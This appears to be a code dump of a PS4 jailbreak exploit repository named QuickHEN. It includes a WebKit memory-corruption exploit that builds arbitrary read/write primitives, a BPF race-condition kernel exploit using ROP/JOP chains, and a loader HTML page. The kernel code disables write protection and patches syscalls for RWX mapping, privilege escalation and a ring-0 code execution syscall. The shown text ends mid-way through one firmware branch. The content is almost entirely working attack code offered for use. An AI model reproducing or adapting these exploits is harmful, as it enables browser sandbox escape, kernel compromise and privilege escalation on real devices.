 32 | function int64(low, hi) {
 33 |     this.low = (low >>> 0);
 34 |     this.hi = (hi >>> 0);
 35 | 
 36 |     this.add32inplace = function (val) {
 37 |         var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 38 |         var new_hi = (this.hi >>> 0);
 39 | 
 40 |         if (new_lo < this.low) {
 41 |             new_hi++;
 42 |         }
 43 | 
 44 |         this.hi = new_hi;
 45 |         this.low = new_lo;
 46 |     }
 47 | 
 48 |     this.add32 = function (val) {
 49 |         var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 50 |         var new_hi = (this.hi >>> 0);
 51 | 
 52 |         if (new_lo < this.low) {
 53 |             new_hi++;
 54 |         }
 55 | 
 56 |         return new int64(new_lo, new_hi);
 57 |     }
 58 | 
 59 |     this.sub32 = function (val) {
 60 |         var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 61 |         var new_hi = (this.hi >>> 0);
 62 | 
 63 |         if (new_lo > (this.low) & 0xFFFFFFFF) {
 64 |             new_hi--;
 65 |         }
 66 | 
 67 |         return new int64(new_lo, new_hi);
 68 |     }
 69 | 
 70 |     this.sub32inplace = function (val) {
 71 |         var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 72 |         var new_hi = (this.hi >>> 0);
 73 | 
 74 |         if (new_lo > (this.low) & 0xFFFFFFFF) {
 75 |             new_hi--;
 76 |         }
 77 | 
 78 |         this.hi = new_hi;
 79 |         this.low = new_lo;
 80 |     }
 81 | 
 82 |     this.and32 = function (val) {
 83 |         var new_lo = this.low & val;
 84 |         var new_hi = this.hi;
 85 |         return new int64(new_lo, new_hi);
 86 |     }
 87 | 
 88 |     this.and64 = function (vallo, valhi) {
 89 |         var new_lo = this.low & vallo;
 90 |         var new_hi = this.hi & valhi;
 91 |         return new int64(new_lo, new_hi);
 92 |     }
 93 | 
 94 |     this.toString = function (val) {
 95 |         val = 16;
 96 |         var lo_str = (this.low >>> 0).toString(val);
 97 |         var hi_str = (this.hi >>> 0).toString(val);
 98 | 
 99 |         if (this.hi == 0)
100 |             return lo_str;
101 |         else
102 |             lo_str = zeroFill(lo_str, 8)
103 | 
104 |         return hi_str + lo_str;
105 |     }
106 | 
107 |     this.toPacked = function () {
108 |         return {
109 |             hi: this.hi,
110 |             low: this.low
111 |         };
112 |     }
113 | 
114 |     this.setPacked = function (pck) {
115 |         this.hi = pck.hi;
116 |         this.low = pck.low;
117 |         return this;
118 |     }
119 | 
120 |     return this;
121 | }
122 | 
123 | function zeroFill(number, width) {
124 |     width -= number.toString().length;
125 | 
126 |     if (width > 0) {
127 |         return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number;
128 |     }
129 | 
130 |     return number + ""; // always return a string
131 | }
132 | 
133 | var nogc = [];
134 | 
135 | var fail = function () {
136 |     alert.apply(null, arguments);
137 |     throw "fail";
138 | }
139 | 
140 | // Target JSObject for overlap
141 | var tgt = {
142 |     a: 0,
143 |     b: 0,
144 |     c: 0,
145 |     d: 0
146 | }
147 | 
148 | var y = new ImageData(1, 0x4000)
149 | postMessage("", "*", [y.data.buffer]);
150 | 
151 | // Spray properties to ensure object is fastmalloc()'d and can be found easily later
152 | var props = {};
153 | 
154 | for (var i = 0;
155 |     (i < (0x4000 / 2));) {
156 |     props[i++] = {
157 |         value: 0x42424242
158 |     };
159 |     props[i++] = {
160 |         value: tgt
161 |     };
162 | }
163 | 
164 | var foundLeak = undefined;
165 | var foundIndex = 0;
166 | var maxCount = 0x100;
167 | 
168 | while (foundLeak == undefined && maxCount > 0) {
169 |     maxCount--;
170 | 
171 |     history.pushState(y, "");
172 | 
173 |     Object.defineProperties({}, props);
174 | 
175 |     var leak = new Uint32Array(history.state.data.buffer);
176 | 
177 |     for (var i = 0; i < leak.length - 6; i++) {
178 |         if (
179 |             leak[i] == 0x42424242 &&
180 |             leak[i + 0x1] == 0xFFFF0000 &&
181 |             leak[i + 0x2] == 0x00000000 &&
182 |             leak[i + 0x3] == 0x00000000 &&
183 |             leak[i + 0x4] == 0x00000000 &&
184 |             leak[i + 0x5] == 0x00000000 &&
185 |             leak[i + 0x6] == 0x0000000E &&
186 |             leak[i + 0x7] == 0x00000000 &&
187 |             leak[i + 0xA] == 0x00000000 &&
188 |             leak[i + 0xB] == 0x00000000 &&
189 |             leak[i + 0xC] == 0x00000000 &&
190 |             leak[i + 0xD] == 0x00000000 &&
191 |             leak[i + 0xE] == 0x0000000E &&
192 |             leak[i + 0xF] == 0x00000000
193 |         ) {
194 |             foundIndex = i;
195 |             foundLeak = leak;
196 |             break;
197 |         }
198 |     }
199 | }
200 | 
201 | if (!foundLeak) {
202 |     failed = true
203 |     fail("Failed to find leak!")
204 | }
205 | 
206 | var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);
207 | var leakJSVal = new int64(firstLeak[8], firstLeak[9]);
208 | 
209 | Array.prototype.__defineGetter__(100, () => 1);
210 | 
211 | var f = document.body.appendChild(document.createElement('iframe'));
212 | var a = new f.contentWindow.Array(13.37, 13.37);
213 | var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37);
214 | 
215 | var master = new Uint32Array(0x1000);
216 | var slave = new Uint32Array(0x1000);
217 | var leakval_u32 = new Uint32Array(0x1000);
218 | var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
219 | 
220 | // Create fake ArrayBufferView
221 | tgt.a = u2d(2048, 0x1602300);
222 | tgt.b = 0;
223 | tgt.c = leakval_helper;
224 | tgt.d = 0x1337;
225 | 
226 | var c = Array.prototype.concat.call(a, b);
227 | document.body.removeChild(f);
228 | var hax = c[0];
229 | c[0] = 0;
230 | 
231 | tgt.c = c;
232 | 
233 | hax[2] = 0;
234 | hax[3] = 0;
235 | 
236 | Object.defineProperty(Array.prototype, 100, {
237 |     get: undefined
238 | });
239 | 
240 | tgt.c = leakval_helper;
241 | var butterfly = new int64(hax[2], hax[3]);
242 | butterfly.low += 0x10;
243 | 
244 | tgt.c = leakval_u32;
245 | var lkv_u32_old = new int64(hax[4], hax[5]);
246 | hax[4] = butterfly.low;
247 | hax[5] = butterfly.hi;
248 | // Setup read/write primitive
249 | 
250 | tgt.c = master;
251 | hax[4] = leakval_u32[0];
252 | hax[5] = leakval_u32[1];
253 | 
254 | var addr_to_slavebuf = new int64(master[4], master[5]);
255 | tgt.c = leakval_u32;
256 | hax[4] = lkv_u32_old.low;
257 | hax[5] = lkv_u32_old.hi;
258 | 
259 | tgt.c = 0;
260 | hax = 0;
261 | 
262 | var prim = {
263 |     write8: function (addr, val) {
264 |         master[4] = addr.low;
265 |         master[5] = addr.hi;
266 | 
267 |         if (val instanceof int64) {
268 |             slave[0] = val.low;
269 |             slave[1] = val.hi;
270 |         } else {
271 |             slave[0] = val;
272 |             slave[1] = 0;
273 |         }
274 | 
275 |         master[4] = addr_to_slavebuf.low;
276 |         master[5] = addr_to_slavebuf.hi;
277 |     },
278 | 
279 |     write4: function (addr, val) {
280 |         master[4] = addr.low;
281 |         master[5] = addr.hi;
282 | 
283 |         slave[0] = val;
284 | 
285 |         master[4] = addr_to_slavebuf.low;
286 |         master[5] = addr_to_slavebuf.hi;
287 |     },
288 | 
289 |     read8: function (addr) {
290 |         master[4] = addr.low;
291 |         master[5] = addr.hi;
292 | 
293 |         var rtv = new int64(slave[0], slave[1]);
294 | 
295 |         master[4] = addr_to_slavebuf.low;
296 |         master[5] = addr_to_slavebuf.hi;
297 | 
298 |         return rtv;
299 |     },
300 | 
301 |     read4: function (addr) {
302 |         master[4] = addr.low;
303 |         master[5] = addr.hi;
304 | 
305 |         var rtv = slave[0];
306 | 
307 |         master[4] = addr_to_slavebuf.low;
308 |         master[5] = addr_to_slavebuf.hi;
309 | 
310 |         return rtv;
311 |     },
312 | 
313 |     leakval: function (jsval) {
314 |         leakval_helper[0] = jsval;
315 |         var rtv = this.read8(butterfly);
316 |         this.write8(butterfly, new int64(0x41414141, 0xffff0000));
317 | 
318 |         return rtv;
319 |     },
320 | 
321 |     createval: function (jsval) {
322 |         this.write8(butterfly, jsval);
323 |         var rt = leakval_helper[0];
324 |         this.write8(butterfly, new int64(0x41414141, 0xffff0000));
325 |         return rt;
326 |     }
327 | };
328 | 
329 | window.primitives = prim;
330 | if (window.postExpl) window.postExpl();
331 | 


--------------------------------------------------------------------------------
/QuickHEN/fake_installer.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/fake_installer.bin


--------------------------------------------------------------------------------
/QuickHEN/index.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 |   <title>QuickHEN 4.55-5.07</title>
  5 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  6 |   <style>
  7 |     .loader {
  8 |       position: absolute;
  9 |       left: 50%;
 10 |       top: 50%;
 11 |       margin: -75px 0 0 -75px;
 12 | 
 13 |       border: 10px solid #f3f3f3;
 14 |       border-radius: 50%;
 15 |       border-top: 10px solid #044595;
 16 |       border-left: 10px solid #044595;
 17 |       width: 120px;
 18 |       height: 120px;
 19 | 
 20 |       -webkit-animation: spin 1s linear infinite;
 21 |     }
 22 | 
 23 |     .info {
 24 |       overflow: hidden;
 25 |       position: fixed;
 26 |       position: absolute;
 27 |       top: 50%;
 28 |       left: 50%;
 29 | 
 30 |       font-size: 45px;
 31 |       font-family: sans-serif;
 32 | 
 33 |       transform: translate(-50%, -50%);
 34 |     }
 35 | 
 36 |     .credits {
 37 |       overflow: hidden;
 38 |       position: fixed;
 39 |       position: absolute;
 40 |       top: 90%;
 41 |       left: 50%;
 42 | 
 43 |       font-size: 16px;
 44 |       font-family: sans-serif;
 45 |       text-align: center;
 46 | 
 47 |       transform: translate(-50%, -90%);
 48 |     }
 49 | 
 50 |     @-webkit-keyframes spin {
 51 |       0% { -webkit-transform: rotate(0deg); }
 52 |       100% { -webkit-transform: rotate(360deg); }
 53 |     }
 54 |   </style>
 55 | </head>
 56 | <body style="margin:0;">
 57 |   <script>
 58 |     window.didload = 0;
 59 |     window.didpost = 0;
 60 | 
 61 |     window.onload = function () {
 62 |       window.didload = 1;
 63 |       if (window.didpost == 1)
 64 |         setTimeout(window.stage2, 1500);
 65 |     }
 66 |     window.postExpl = function () {
 67 |       window.didpost = 1;
 68 |       if (window.didload == 1)
 69 |         setTimeout(window.stage2, 1500);
 70 |     }
 71 | 
 72 |     function allset() {
 73 |       document.getElementById("loader").style.display = "none";
 74 |       document.getElementById("allset").style.display = "block";
 75 |     }
 76 | 
 77 |     function awaitpl() {
 78 |       document.getElementById("loader").style.display = "none";
 79 |       document.getElementById("awaiting").style.display = "block";
 80 |     }
 81 | 
 82 |     function fail(info) {
 83 |       document.getElementById("loader").style.display = "none";
 84 |       document.getElementById("fail").style.display = "block";
 85 |     }
 86 |   </script>
 87 | 
 88 |   <div id="loader" class="loader"></div>
 89 | 
 90 |   <div id="awaiting" class="info" style="display:none;">
 91 |     Awaiting Payload...
 92 |   </div>
 93 | 
 94 |   <div id="allset" class="info" style="display:none;">
 95 |     You're all set!
 96 |   </div>
 97 | 
 98 |   <div id="fail" class="info" style="display:none;">
 99 |     Something went wrong :(
100 |   </div>
101 | 
102 |   <div id="badfw" class="info" style="display:none;">
103 |     Only firmwares 4.55-5.07 are supported!
104 |   </div>
105 | 
106 |   <div id="footer" class="credits">
107 |     <ul style="list-style: none;padding-left:0">
108 |       <li>Exploits from qwertyoruiopz</li>
109 |       <li>Homebrew thanks to flatz, idc, WildCard, zecoxao, xvortex</li>
110 |       <li>Implementation by Specter and CelesteBlue</li>
111 |     </ul>
112 |   </div>
113 | 
114 |   <script src="./rop.js"></script>
115 |   <script src="./syscalls.js"></script>
116 |   <script src="./expl.js"></script>
117 |   <script src="./kernel.js"></script>
118 |   <script src="./userland.js"></script>
119 |   <pre id="console"></pre>
120 | </body>
121 | </html>


--------------------------------------------------------------------------------
/QuickHEN/kdumper.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/kdumper.bin


--------------------------------------------------------------------------------
/QuickHEN/kernel.js:
--------------------------------------------------------------------------------
  1 | function kernExploit() {
  2 | 	try {
  3 | 		var fd = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
  4 | 		if (fd == (-1 >>> 0))
  5 | 			throw "Failed to open first bpf device!"
  6 | 		var fd1 = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
  7 | 		
  8 | 		// Write BPF programs
  9 | 		var bpf_valid = p.malloc32(0x4000);
 10 | 		var bpf_spray = p.malloc32(0x4000);
 11 | 		var bpf_valid_u32 = bpf_valid.backing;
 12 | 		
 13 | 		var bpf_valid_prog = p.malloc(0x40);
 14 | 		p.write8(bpf_valid_prog, 0x800 / 8)
 15 | 		p.write8(bpf_valid_prog.add32(8), bpf_valid)
 16 | 		
 17 | 		var bpf_spray_prog = p.malloc(0x40);
 18 | 		p.write8(bpf_spray_prog, 0x800 / 8)
 19 | 		p.write8(bpf_spray_prog.add32(8), bpf_spray)
 20 | 		
 21 | 		for (var i = 0; i < 0x400;) {
 22 | 			bpf_valid_u32[i++] = 6;
 23 | 			bpf_valid_u32[i++] = 0;
 24 | 		}
 25 | 		
 26 | 		var rtv = p.syscall("sys_ioctl", fd, 0x8010427B, bpf_valid_prog);
 27 | 		if (rtv.low != 0)
 28 | 			throw "Failed to open first bpf device!";
 29 | 		
 30 | 		// Spawn thread
 31 | 		var spawnthread = function (name, chain) {
 32 | 			var contextp = p.malloc32(0x2000);
 33 | 			var contextz = contextp.backing;
 34 | 			contextz[0] = 1337;
 35 | 			var thread2 = new rop();
 36 | 			thread2.push(window.gadgets["ret"]);
 37 | 			thread2.push(window.gadgets["ret"]);
 38 | 			thread2.push(window.gadgets["ret"]);
 39 | 			thread2.push(window.gadgets["ret"]);
 40 | 			chain(thread2);
 41 | 			p.write8(contextp, window.gadgets["ret"]);
 42 | 			p.write8(contextp.add32(0x10), thread2.stackBase);
 43 | 			p.syscall(324, 1);
 44 | 			var retv = function () { p.fcall(window.gadgets["createThread"], window.gadgets["longjmp"], contextp, p.stringify(name)); }
 45 | 			window.nogc.push(contextp);
 46 | 			window.nogc.push(thread2);
 47 | 			return retv;
 48 | 		}
 49 | 		
 50 | 		var interrupt1, loop1;
 51 | 		var interrupt2, loop2;
 52 | 		var sock = p.syscall(97, 2, 2);
 53 | 		
 54 | 		// Racing thread
 55 | 		var start1 = spawnthread("GottaGoFast", function (thread2) {
 56 | 			interrupt1 = thread2.stackBase;
 57 | 			thread2.push(window.gadgets["ret"]);
 58 | 			thread2.push(window.gadgets["ret"]);
 59 | 			thread2.push(window.gadgets["ret"]);
 60 | 			
 61 | 			thread2.push(window.gadgets["pop rdi"]);
 62 | 			thread2.push(fd);
 63 | 			thread2.push(window.gadgets["pop rsi"]);
 64 | 			thread2.push(0x8010427B);
 65 | 			thread2.push(window.gadgets["pop rdx"]);
 66 | 			thread2.push(bpf_valid_prog);
 67 | 			thread2.push(window.gadgets["pop rsp"]);
 68 | 			thread2.push(thread2.stackBase.add32(0x800));
 69 | 			thread2.count = 0x100;
 70 | 			var cntr = thread2.count;
 71 | 			thread2.push(window.syscalls[54]); // ioctl
 72 | 			thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
 73 | 			
 74 | 			thread2.push(window.gadgets["pop rdi"]);
 75 | 			var wherep = thread2.pushSymbolic();
 76 | 			thread2.push(window.gadgets["pop rsi"]);
 77 | 			var whatp = thread2.pushSymbolic();
 78 | 			thread2.push(window.gadgets["mov [rdi], rsi"]);
 79 | 			
 80 | 			thread2.push(window.gadgets["pop rsp"]);
 81 | 			
 82 | 			loop1 = thread2.stackBase.add32(thread2.count * 8);
 83 | 			thread2.push(0x41414141);
 84 | 			
 85 | 			thread2.finalizeSymbolic(wherep, loop1);
 86 | 			thread2.finalizeSymbolic(whatp, loop1.sub32(8));
 87 | 		});
 88 | 		
 89 | 		// start setting up chains
 90 | 		var krop = new rop();
 91 | 		
 92 | 		var kscratch = p.malloc32(0x1000);
 93 | 		var ctxp  = p.malloc32(0x1000);
 94 | 		var ctxp1 = p.malloc32(0x1000);
 95 | 		var ctxp2 = p.malloc32(0x1000);
 96 | 		
 97 | 		
 98 | 		// Helper function for patching kernel
 99 | 		var kpatch = function(offset, qword) {
100 | 			krop.push(window.gadgets["pop rax"]);
101 | 			krop.push(kscratch);
102 | 			krop.push(window.gadgets["mov rax, [rax]"]);
103 | 			krop.push(window.gadgets["pop rsi"]);
104 | 			krop.push(offset);
105 | 			krop.push(window.gadgets["add rax, rsi"]);
106 | 			krop.push(window.gadgets["pop rsi"]);
107 | 			krop.push(qword);
108 | 			krop.push(window.gadgets["mov [rax], rsi"]);
109 | 		}
110 | 		
111 | 		// Helper function for patching kernel with information from kernel.text
112 | 		var kpatch2 = function(offset, offset2) {
113 | 			krop.push(window.gadgets["pop rax"]);
114 | 			krop.push(kscratch);
115 | 			krop.push(window.gadgets["mov rax, [rax]"]);
116 | 			krop.push(window.gadgets["pop rsi"]);
117 | 			krop.push(offset);
118 | 			krop.push(window.gadgets["add rax, rsi"]);
119 | 			krop.push(window.gadgets["mov rdi, rax"]);
120 | 			krop.push(window.gadgets["pop rax"]);
121 | 			krop.push(kscratch);
122 | 			krop.push(window.gadgets["mov rax, [rax]"]);
123 | 			krop.push(window.gadgets["pop rsi"]);
124 | 			krop.push(offset2);
125 | 			krop.push(window.gadgets["add rax, rsi"]);
126 | 			krop.push(window.gadgets["mov [rdi], rax"]);
127 | 		}
128 | 		
129 | 		var stackshift_from_retaddr = 0;
130 | 		
131 | 		p.write8(bpf_spray.add32(0x10), ctxp);     // Spray heap with the fake knote object
132 | 		p.write8(ctxp.add32(0x50), 0);             // Set knote->kn_status to 0 to detach
133 | 		p.write8(ctxp.add32(0x68), ctxp1); // Set knote->kn_fops to fake function table
134 | 		
135 | 		p.write8(ctxp1.add32(0x10), window.gadgets["jop1"]);  // Set kn_fops->f_detach to first JOP gadget
136 | 		stackshift_from_retaddr += 0x8 + window.gadgets_shift["stackshift_jop1"];
137 | 		
138 | 		p.write8(ctxp.add32(0x00), ctxp2);  // Set rdi
139 | 		p.write8(ctxp.add32(0x10), ctxp2.add32(0x08));
140 | 		p.write8(ctxp2.add32(0x7D0), window.gadgets["jop2"]); // Chain to next gadget
141 | 		
142 | 		var iterbase = ctxp2;
143 | 		
144 | 		for (var i = 0; i < 0xF; i++) {
145 | 			p.write8(iterbase, window.gadgets["jop1"]); // Chain to next gadget
146 | 			stackshift_from_retaddr += 0x8 + window.gadgets_shift["stackshift_jop1"];
147 | 			
148 | 			p.write8(iterbase.add32(0x7D0 + 0x20), window.gadgets["jop2"]); // Chain to next gadget
149 | 			
150 | 			p.write8(iterbase.add32(0x08), iterbase.add32(0x20));
151 | 			p.write8(iterbase.add32(0x18), iterbase.add32(0x28));
152 | 			iterbase = iterbase.add32(0x20);
153 | 		}
154 | 		
155 | 		var raxbase = iterbase;
156 | 		var rdibase = iterbase.add32(0x08);
157 | 		var memcpy = get_jmptgt(webKitBase.add32(0xF8));
158 | 		memcpy = p.read8(memcpy);
159 | 		
160 | 		p.write8(raxbase, window.gadgets["jop3"]); // Chain to next gadget
161 | 		stackshift_from_retaddr += 0x8;
162 | 		
163 | 		p.write8(rdibase.add32(0x70), window.gadgets["jop4"]); // Chain to next gadget
164 | 		stackshift_from_retaddr += 0x8;
165 | 		
166 | 		p.write8(rdibase.add32(0x18), rdibase);
167 | 		p.write8(rdibase.add32(0x08), krop.stackBase); // Sets RSI to krop stack's location
168 | 		p.write8(raxbase.add32(0x30), window.gadgets["jop_mov rbp, rsp"]); // Save RSP
169 | 		
170 | 		p.write8(rdibase, raxbase); // [rdi] = rax
171 | 		p.write8(raxbase.add32(0x420), window.gadgets["jop6"]); // Chain to next gadget
172 | 		stackshift_from_retaddr += window.gadgets_shift["stackshift_jop6"];
173 | 		
174 | 		var topofchain = stackshift_from_retaddr;
175 | 		p.write8(raxbase.add32(0x40), memcpy.add32(0x32)); // Chain to memcpy
176 | 		p.write8(rdibase.add32(0xB0), topofchain); // Write size for memcpy
177 | 		
178 | 		for (var i = 0; i < 0x1000 / 8; i++)
179 | 			p.write8(krop.stackBase.add32(i * 8), window.gadgets["ret"]);
180 | 		
181 | 		krop.count = 0x10;
182 | 		
183 | 		p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
184 | 		p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
185 | 		p.write8(kscratch.add32(0x18), kscratch);
186 | 		
187 | 		//krop.push(window.gadgets["infloop"]); // only for kexploit debug test
188 | 		
189 | 		krop.push(window.gadgets["pop rdi"]);
190 | 		krop.push(kscratch.add32(0x18));
191 | 		krop.push(window.gadgets["jop_mov rbp, rsp"]);
192 | 		
193 | 		var rboff = topofchain - krop.count * 8;
194 | 		
195 | 		krop.push(window.gadgets["jop6"]); // lea rdi, [rbp - 0x28]
196 | 		rboff += window.gadgets_shift["stackshift_jop6"];
197 | 		krop.push(window.gadgets["pop rax"]);
198 | 		krop.push(rboff);
199 | 		krop.push(window.gadgets["add rdi, rax"]);
200 | 		
201 | 		if (fwFromUA == "5.01") {
202 | 			krop.push(window.gadgets["mov rax, [rdi]"]);
203 | 			krop.push(window.gadgets["pop rsi"]);
204 | 			krop.push(0x2FA); // 5.01-5.05
205 | 			krop.push(window.gadgets["add rax, rsi"]);
206 | 			krop.push(window.gadgets["mov [rdi], rax"]);
207 | 			
208 | 			// Save context of cr0 register
209 | 			krop.push(window.gadgets["pop rdi"]); // save address in usermode
210 | 			krop.push(kscratch);
211 | 			krop.push(window.gadgets["mov [rdi], rax"]);
212 | 			krop.push(window.gadgets["pop rsi"]);
213 | 			krop.push(0xC54B4); // 5.01-5.05
214 | 			krop.push(window.gadgets["add rax, rsi"]);
215 | 			krop.push(window.gadgets["pop rdi"]);
216 | 			krop.push(kscratch.add32(0x08));
217 | 			krop.push(window.gadgets["mov [rdi], rax"]);
218 | 			krop.push(window.gadgets["jmp rax"]);
219 | 			krop.push(window.gadgets["pop rdi"]); // save cr0
220 | 			krop.push(kscratch.add32(0x10));
221 | 			
222 | 			// Disable kernel write protection for .text
223 | 			krop.push(window.gadgets["mov [rdi], rax"]); // Save cr0 register
224 | 			krop.push(window.gadgets["pop rsi"]);
225 | 			krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
226 | 			krop.push(window.gadgets["and rax, rsi"]);
227 | 			krop.push(window.gadgets["mov rdx, rax"]);
228 | 			krop.push(window.gadgets["pop rax"]);
229 | 			krop.push(kscratch.add32(8));
230 | 			krop.push(window.gadgets["mov rax, [rax]"]);
231 | 			krop.push(window.gadgets["pop rsi"]);
232 | 			krop.push(0x9);
233 | 			krop.push(window.gadgets["add rax, rsi"]);
234 | 			krop.push(window.gadgets["mov rdi, rax"]);
235 | 			krop.push(window.gadgets["mov rax, rdx"]);
236 | 			krop.push(window.gadgets["jmp rdi"]);
237 | 			
238 | 			krop.push(window.gadgets["pop rax"]);
239 | 			krop.push(kscratch);
240 | 			krop.push(window.gadgets["mov rax, [rax]"]);
241 | 			krop.push(window.gadgets["pop rsi"]);
242 | 			krop.push(0x3609A); // 5.01-5.05
243 | 			krop.push(window.gadgets["add rax, rsi"]);
244 | 			krop.push(window.gadgets["mov rax, [rax]"]);
245 | 			krop.push(window.gadgets["pop rdi"]);
246 | 			krop.push(kscratch.add32(0x330));
247 | 			krop.push(window.gadgets["mov [rdi], rax"]);
248 | 			
249 | 			// Patch sys_mprotect: Allow RWX mapping
250 | 			patch_mprotect = new int64(0x9090FA38, 0x90909090); // 5.01-5.05
251 | 			kpatch(0x3609A, patch_mprotect); // 5.01-5.05
252 | 			
253 | 			// Patch sys_setuid: add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
254 | 			var patch_sys_setuid_offset = new int64(0xFFEE7016, 0xFFFFFFFF); // 5.01
255 | 			var patch_sys_setuid = new int64(0x000000B8, 0xC4894100); // 5.01-5.05
256 | 			kpatch(patch_sys_setuid_offset, patch_sys_setuid);
257 | 			
258 | 			// Patch amd64_syscall: syscall instruction allowed anywhere
259 | 			var patch_amd64_syscall_offset1 = new int64(0xFFE92A37, 0xFFFFFFFF); // 5.01
260 | 			var patch_amd64_syscall_offset2 = new int64(0xFFE92A55, 0xFFFFFFFF); // 5.01
261 | 			var patch_amd64_syscall_1 = new int64(0x00000000, 0x40878B49); // 5.01-5.05
262 | 			var patch_amd64_syscall_2 = new int64(0x90907DEB, 0x72909090); // 5.01-5.05
263 | 			kpatch(patch_amd64_syscall_offset1, patch_amd64_syscall_1);
264 | 			kpatch(patch_amd64_syscall_offset2, patch_amd64_syscall_2);
265 | 			
266 | 			// Patch: sys_mmap: allow RWX mapping from anywhere
267 | 			var patch_sys_mmap_offset = new int64(0xFFFCFAB4, 0xFFFFFFFF); // 5.01-5.05
268 | 			var patch_sys_mmap = new int64(0x37B64037, 0x3145C031); // 5.01-5.05
269 | 			kpatch(patch_sys_mmap_offset, patch_sys_mmap);
270 | 			
271 | 			// Patch sys_dynlib_dlsym: allow dynamic resolving from anywhere
272 | 			var patch_sys_dynlib_dlsym_1 = new int64(0x000000E9, 0x8B489000); // 5.01-5.05
273 | 			var patch_sys_dynlib_dlsym_2 = new int64(0x90C3C031, 0x90909090); // 5.01-5.05
274 | 			kpatch(0xCA3CE,  patch_sys_dynlib_dlsym_1); // 5.01-5.05
275 | 			kpatch(0x1448F4, patch_sys_dynlib_dlsym_2); // 5.01
276 | 			
277 | 			// Patch sysent entry #11: sys_kexec() custom syscall to execute code in ring0
278 | 			var patch_sys_exec_1 = new int64(0x00F0EDC4, 0); // 5.01
279 | 			var patch_sys_exec_2A = new int64(0x00F0EDCC, 0); // 5.01
280 | 			var patch_sys_exec_2B = new int64(0xFFEA5A04, 0xFFFFFFFF); // 5.01
281 | 			var patch_sys_exec_3 = new int64(0x00F0EDEC, 0); // 5.01
282 | 			var patch_sys_exec_param1 = new int64(0x02, 0);
283 | 			var patch_sys_exec_param3 = new int64(0, 1);
284 | 			kpatch(patch_sys_exec_1, patch_sys_exec_param1);
285 | 			kpatch2(patch_sys_exec_2A, patch_sys_exec_2B);
286 | 			kpatch(patch_sys_exec_3, patch_sys_exec_param3);
287 | 			
288 | 			// Enable kernel write protection for .text
289 | 			krop.push(window.gadgets["pop rax"]);
290 | 			krop.push(kscratch.add32(0x08));
291 | 			krop.push(window.gadgets["mov rax, [rax]"]);
292 | 			krop.push(window.gadgets["pop rsi"]);
293 | 			krop.push(0x09);
294 | 			krop.push(window.gadgets["add rax, rsi"]);
295 | 			krop.push(window.gadgets["mov rdi, rax"]);
296 | 			krop.push(window.gadgets["pop rax"]);
297 | 			krop.push(kscratch.add32(0x10)); // Restore old cr0 value with WP bit set
298 | 			krop.push(window.gadgets["mov rax, [rax]"]);
299 | 			krop.push(window.gadgets["jmp rdi"]);
300 | 			
301 | 		} else if (fwFromUA == "5.05") {
302 | 			krop.push(window.gadgets["mov rax, [rdi]"]);
303 | 			krop.push(window.gadgets["pop rsi"]);
304 | 			krop.push(0x2FA);
305 | 			krop.push(window.gadgets["add rax, rsi"]);
306 | 			krop.push(window.gadgets["mov [rdi], rax"]);
307 | 			
308 | 			// Save context of cr0 register
309 | 			krop.push(window.gadgets["pop rdi"]); // save address in usermode
310 | 			krop.push(kscratch);
311 | 			krop.push(window.gadgets["mov [rdi], rax"]);
312 | 			krop.push(window.gadgets["pop rsi"]);
313 | 			krop.push(0xC54B4);
314 | 			krop.push(window.gadgets["add rax, rsi"]);
315 | 			krop.push(window.gadgets["pop rdi"]);
316 | 			krop.push(kscratch.add32(0x08));
317 | 			krop.push(window.gadgets["mov [rdi], rax"]);
318 | 			krop.push(window.gadgets["jmp rax"]);
319 | 			krop.push(window.gadgets["pop rdi"]); // save cr0
320 | 			krop.push(kscratch.add32(0x10));
321 | 			
322 | 			// Disable kernel write protection for .text
323 | 			krop.push(window.gadgets["mov [rdi], rax"]); // Save cr0 register
324 | 			krop.push(window.gadgets["pop rsi"]);
325 | 			krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
326 | 			krop.push(window.gadgets["and rax, rsi"]);
327 | 			krop.push(window.gadgets["mov rdx, rax"]);
328 | 			krop.push(window.gadgets["pop rax"]);
329 | 			krop.push(kscratch.add32(8));
330 | 			krop.push(window.gadgets["mov rax, [rax]"]);
331 | 			krop.push(window.gadgets["pop rsi"]);
332 | 			krop.push(0x9);
333 | 			krop.push(window.gadgets["add rax, rsi"]);
334 | 			krop.push(window.gadgets["mov rdi, rax"]);
335 | 			krop.push(window.gadgets["mov rax, rdx"]);
336 | 			krop.push(window.gadgets["jmp rdi"]);
337 | 			
338 | 			krop.push(window.gadgets["pop rax"]);
339 | 			krop.push(kscratch);
340 | 			krop.push(window.gadgets["mov rax, [rax]"]);
341 | 			krop.push(window.gadgets["pop rsi"]);
342 | 			krop.push(0x3609A);
343 | 			krop.push(window.gadgets["add rax, rsi"]);
344 | 			krop.push(window.gadgets["mov rax, [rax]"]);
345 | 			krop.push(window.gadgets["pop rdi"]);
346 | 			krop.push(kscratch.add32(0x330));
347 | 			krop.push(window.gadgets["mov [rdi], rax"]);
348 | 			
349 | 			// Patch sys_mprotect: Allow RWX mapping
350 | 			patch_mprotect = new int64(0x9090FA38, 0x90909090);
351 | 			kpatch(0x3609A, patch_mprotect);
352 | 			
